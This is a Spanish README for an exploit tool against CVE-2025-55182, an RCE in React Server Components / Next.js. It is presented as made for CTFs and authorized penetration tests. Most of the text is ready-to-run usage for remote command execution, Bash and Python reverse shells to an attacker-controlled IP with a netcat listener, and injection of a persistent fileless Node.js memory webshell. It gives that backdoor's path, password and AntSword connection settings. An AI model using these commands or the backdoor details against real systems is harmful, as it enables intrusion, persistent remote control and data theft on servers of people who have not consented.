
Autor: lamaper / BITs2Sys
Versión: 1.0.1
Licencia: MIT
Esta herramienta es una herramienta de pruebas de penetración automatizada diseñada específicamente para CVE-2025-55182 (contaminación de prototipos en React Server Components / Next.js que conduce a RCE). Está diseñada para competiciones CTF y proyectos de seguridad autorizados, integrando múltiples funciones como verificación de vulnerabilidades, detección de conectividad saliente, reverse shells e inyección de memoria webshell (memory马).
--cmd):Utiliza el mecanismo de excepción NEXT_REDIRECT para devolver con precisión los resultados de la ejecución de comandos codificados en Base64.--check-outbound):Prueba automáticamente la capacidad del objetivo para acceder a DNS, HTTP e ICMP, lo que ayuda a decidir la ruta de ataque.--shell):Incluye modos de reverse shell Bash y Python3, con soporte de ejecución asíncrona para evitar que las solicitudes HTTP se bloqueen.--inject-ms):Inyecta una memory webshell secuestrando el mecanismo de distribución de eventos de http.Server en Node.js, sin dejar archivos y con control persistente.--ms-cmd):Modo interactivo independiente de la ruta de activación de la vulnerabilidad; después de una inyección exitosa, los comandos pueden ejecutarse directamente a través de la puerta trasera.Esta herramienta está desarrollada en Python 3 y solo requiere la biblioteca requests.
pip install requests
https://github.com/assetnote/react2shell-scanner es una herramienta de detección muy útil
Obtenga directamente información del objetivo:
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"
Antes de intentar una reverse shell, confirme si el objetivo puede conectarse a la red externa:
python exploit.py --url http://target.com/ --check-outbound
Modo Bash:
# Escuche en la máquina atacante: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <TU_IP> --port 4444
Modo Python:
python exploit.py --url http://target.com/ --shell python --ip <TU_IP> --port 4444
Inyección de la memory webshell:
python exploit.py --url http://target.com/ --inject-ms
Ejecutar comandos a través de la memory webshell (después de una inyección exitosa):
python exploit.py --url http://target.com/ --ms-cmd "whoami"
Nota: la ruta de montaje predeterminada de la memory webshell es /?pass, y se activa enviando el parámetro pwd mediante POST.
Conexión con AntSword (China Ant Sword):
Contraseña de conexión: pwd, método de conexión CMDLINUX
Esta herramienta está destinada únicamente a investigación de seguridad, competiciones CTF y pruebas de penetración autorizadas dentro de los límites permitidos por la ley. Está estrictamente prohibido utilizarla para ataques ilegales. Todas las consecuencias derivadas del uso de esta herramienta son responsabilidad exclusiva del usuario.